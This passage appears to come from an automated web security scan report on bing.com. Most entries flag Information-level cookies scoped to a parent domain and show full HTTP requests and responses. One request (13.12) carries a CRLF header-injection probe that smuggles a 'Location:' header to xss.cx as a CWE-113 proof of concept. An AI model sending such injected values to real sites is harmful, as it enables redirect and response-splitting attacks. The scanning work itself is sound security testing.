HTTP/1.1 302 Moved Temporarily
Date: Tue, 19 Jul 2011 09:42:24 GMT
Content-length: 0
Content-type: text/html
Cache-Control: no-cache
Location: https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp?TYPE=33554433&REALMOID=06-3a718f7c-1c9d-0019-0000-6b5800006b58&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=nQv7GGyWUMf3GogDceQgLNkheYYCBKvmyZclEoI8LpvnPyAtYAwhziS4s5RAFbbT&TARGET=$SM$https%3a%2f%2fwellsoffice%2ewellsfargo%2ecom%2f
Set-Cookie: TLTSID=687AB7CCB1EB10B1991CF87992750532; Path=/; Domain=.wellsfargo.com; Secure
Set-Cookie: TLTSID=687AC5BEB1EB10B1991DF87992750532; Path=/; Domain=.wellsfargo.com; Secure
Set-Cookie: TLTSID=687AC65EB1EB10B1991EF87992750532; Path=/; Domain=.wellsfargo.com; Secure


13.11. http://www.bing.com/community/css-classnameexpansion.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /community/css-classnameexpansion.ashx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/css-classnameexpansion.ashx?css=%2fcommunity%2fthemes%2fgeneric%2fcss%2flayout.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/css; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Telligent-Evolution: 5.5.134.12674
X-AspNet-Version: 2.0.50727
XSHOST: WS1
Vary: Accept-Encoding
Content-Length: 15825
Date: Tue, 19 Jul 2011 12:10:45 GMT
Connection: close
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+19+Jul+2011+12%3a10%3a45+GMT; expires=Wed, 18-Jul-2012 12:10:45 GMT; path=/community
Set-Cookie: CommunityServer-LastVisitUpdated-1001=; path=/community
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+19+Jul+2011+12%3a10%3a45+GMT; expires=Wed, 18-Jul-2012 12:10:45 GMT; path=/community
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:10:44 GMT; domain=.bing.com; path=/

.page-management-header { }.page-management { text-align: left; font-family: Arial, Helvetica !important; font-size: 12px !important; position: relative; border-top: solid 2px #aaa; background-color:
...[SNIP]...

13.12. http://www.bing.com/events/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /events/search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/search?q=http://xss.cx/%3f%0D%0ALocation:%20http://xss.cx/default.aspx?cwe-113-poc-via-bing.com HTTP/1.1
Host: www.bing.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SRCHUID=V=2&GUID=E8D2DDB02E5B451C9F1EB509739AB1CC; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110601; SRCHD=SM=1&MS=1842502&D=1841741&AF=MSN005; MUID=3957719BE8F34A5DA51D204E7E06704A; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; _FP=; _RwBf=credit=-1&s=0; _UR=OMW=1

Response

HTTP/1.1 200 OK
Content-Length: 0
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:05:34 GMT
Connection: close
Set-Cookie: _SS=SID=6972CFBED6CD45B1A2140850C807FA64; domain=.bing.com; path=/


13.13. http://www.bing.com/fd/AnswerBarHandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/AnswerBarHandler

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/AnswerBarHandler?q=Jonah%20Hill&vertical=VirtualEarth&subvertical=maps HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bing.com
Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865531&D=1865529&AF=MPSRCH; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; _FS=mkt=en-US
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 881
Date: Tue, 19 Jul 2011 12:11:11 GMT
Connection: keep-alive
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865531&D=1865529&AF=MPSRCH; expires=Thu, 18-Jul-2013 12:11:11 GMT; domain=.bing.com; path=/

<ul class="sw_a" id="sw_abarl"><li><a href="/search?q=Jonah+Hill" onmousedown="return si_T('&amp;ID=FD,4.1')">Web</a></li><li><a href="/news/search?q=Jonah+Hill&amp;qpvt=Jonah+Hill" onmousedown="retur
...[SNIP]...

13.14. http://www.bing.com/fd/InlineFeedbackHandler.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/InlineFeedbackHandler.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/InlineFeedbackHandler.aspx?IG=29ae479b70674c24adf680937cb5e176&CID=14230B4BB5064F8B9C1A3D1C2C91E937&IID=FD.1&WFID=wf11 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bing.com
Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=D=1865529&MS=1865529&AF=MPSRCH; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:34 GMT
Content-Length: 2459
Connection: keep-alive
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

<div class="fbd" id="wf11"><div class="fbcontainer" id="wf11wdg1" style="display: none;"><form action="#" name="fb_formwf11wdg1"><table cellpadding="0" cellspacing="0" class="fbt" width="100%"><tbody>
...[SNIP]...

13.15. http://www.bing.com/fd/ls/GLinkPing.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/GLinkPing.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/GLinkPing.aspx?IG=33ba7e8b57514147a88c942f70994212&CID=14230B4BB5064F8B9C1A3D1C2C91E937&PM=Y&ID=FD,22.1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:09:22 GMT
Connection: close
Set-Cookie: _SS=SID=84364DCD717D4D0BB86135D1E06CC7AF; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865529; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=FA19F2A46E8B44F79C0D92A1E319533C; expires=Thu, 18-Jul-2013 12:09:22 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

13.16. http://www.bing.com/fd/ls/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/l

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/l?IG=0a2cf4887a3946bf9d66aedb51daf8c2&CID=14230B4BB5064F8B9C1A3D1C2C91E937&PM=Y&Type=Event.CPT&DATA={"pp":{"S":"L","PC":28,"FC":-1,"BC":28,"BS":45,"H":46,"FE":-1,"LE":-1,"C1":-1,"C2":-1,"BP":47,"KP":-1,"CT":606,"IL":2}}&P=SERP&DA=Bl2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:09:23 GMT
Connection: close
Set-Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865529; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1; expires=Thu, 18-Jul-2013 12:09:22 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:09:22 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

13.17. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/AppGalleryDisplayProvider.ashx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/AppGalleryDisplayProvider.ashx?q=Jonah+Hill&mkt=en-US&FORM=BYFD HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865531&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4562
Content-Type: application/json; charset=utf-8
Expires: -1
X-BM-TraceID: e73c6b6f5dbd46658ecc67e88bfb7ca8
X-Ve-Server: BL2-01203-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001203
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:11:38 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: SRCHD=AF=BYFD&MS=1865531&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:11:38 GMT; domain=.bing.com; path=/

window.appGalleryContainerJSON = {"catUrl":"http://c0.ecn.catalogservice.virtualearth.net/cs/dc/pf/Catalog/676cd0b3-da60-4183-a07f-59d638480169_Catalog.xap.png","AppGalleryMarkup":"\r\n\r\n\u003cdiv i
...[SNIP]...

13.18. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/AppGalleryDisplayProvider.ashx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/AppGalleryDisplayProvider.ashx?q=&mkt=en&FORM=BYLH HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4562
Content-Type: application/json; charset=utf-8
Expires: -1
X-BM-TraceID: 381b21893e064134838136a47cf10f1d
X-Ve-Server: BL2-01211-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:43 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1865529&MS=1865529&AF=BYLH; expires=Thu, 18-Jul-2013 12:09:42 GMT; domain=.bing.com; path=/

window.appGalleryContainerJSON = {"catUrl":"http://c0.ecn.catalogservice.virtualearth.net/cs/dc/pf/Catalog/676cd0b3-da60-4183-a07f-59d638480169_Catalog.xap.png","AppGalleryMarkup":"\r\n\r\n\u003cdiv i
...[SNIP]...

13.19. http://www.bing.com/maps/MapAppsScript.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/MapAppsScript.ashx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/MapAppsScript.ashx?q=&mkt=en&FORM=BYLH HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
X-BM-TraceID: 45902850fb194154bf99af43b8d3f5ac
X-Ve-Server: BL2-01209-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001209
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1865529&MS=1865529&AF=BYLH; expires=Thu, 18-Jul-2013 12:09:42 GMT; domain=.bing.com; path=/
Content-Length: 6709

var slContainerText = "<div id='silverlightControlHost' style='height: 1px; width: 2px; top: 30px; left: 0px; position: absolute;'><object id='mapAppSL' data='data:application/x-silverlight-2,' type='
...[SNIP]...

13.20. http://www.bing.com/maps/MapAppsScript.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/MapAppsScript.ashx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/MapAppsScript.ashx?q=&mkt=en-US&FORM=BYFD HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
X-BM-TraceID: ba10842c4078412f98876aba4f7bb278
X-Ve-Server: BL2-01204-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001204
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:10:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: SRCHD=AF=BYFD&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:10:00 GMT; domain=.bing.com; path=/
Content-Length: 6709

var slContainerText = "<div id='silverlightControlHost' style='height: 1px; width: 2px; top: 30px; left: 0px; position: absolute;'><object id='mapAppSL' data='data:application/x-silverlight-2,' type='
...[SNIP]...

13.21. http://www.bing.com/maps/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /maps/default.aspx?mkt=en&form=MPSRCH HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache,no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.bing.com
Content-Length: 2647
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

scriptManager=scriptManager%7cInvokeCategoryBrowser&__EVENTTARGET=InvokeCategoryBrowser&__EVENTARGUMENT=undefined&__VIEWSTATE=%2fwEPDwUJMTMyNzQzNzcxD2QWDGYPFgIeBFRleHQFCTxmZDpoZWFkPmQCBg8WAh8ABQo8L2Zk
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 0c13e1f5d3e94de590841c22ebc809c4
X-Ve-Server: BL2-01202-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001202
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1865529&MS=1865529&AF=MPSRCH; expires=Thu, 18-Jul-2013 12:09:31 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; expires=Thu, 18-Jul-2013 12:09:31 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:09:31 GMT; domain=.bing.com; path=/
Content-Length: 11829

6516|updatePanel|TaskHost_Search|
   
                           <span id="TaskHost_SearchTaskPageContext" class="PageContext"><span id="TaskHost_TaskHost_Search_pt" style="display:none;"></span><
...[SNIP]...

13.22. http://www.bing.com/maps/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /maps/default.aspx?mkt=en-US&form=MPSRCH HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache,no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.bing.com
Cookie: SRCHUID=V=2&GUID=CA4315D1E17546D3B93B0DDCD4AE02E2; _SS=SID=8F7B556BEB1545AF807B2ED8B8E566EF; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529&D=1865529&AF=MPSRCH; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719
Content-Length: 2657
Accept-Encoding: gzip, deflate

scriptManager=scriptManager%7cInvokeCategoryBrowser&__EVENTTARGET=InvokeCategoryBrowser&__EVENTARGUMENT=undefined&__VIEWSTATE=%2fwEPDwUJMTMyNzQzNzcxD2QWDGYPFgIeBFRleHQFCTxmZDpoZWFkPmQCBg8WAh8ABQo8L2Zk
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 717d213c93e1401590752582d6ba7a32
X-Ve-Server: BL2-01208-20110629.2253-0
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:10:00 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1865530&D=1865529&AF=MPSRCH; expires=Thu, 18-Jul-2013 12:10:00 GMT; domain=.bing.com; path=/
Content-Length: 11836

6516|updatePanel|TaskHost_Search|
   
                           <span id="TaskHost_SearchTaskPageContext" class="PageContext"><span id="TaskHost_TaskHost_Search_pt" style="display:none;"></span><
...[SNIP]...

13.23. http://www.bing.com/news/s/news3B_c.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3B_c.css

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/s/news3B_c.css?v=1126040805 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=D=1865529&MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=2451BC32004969401AB2BE06044969F0&TUID=1; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
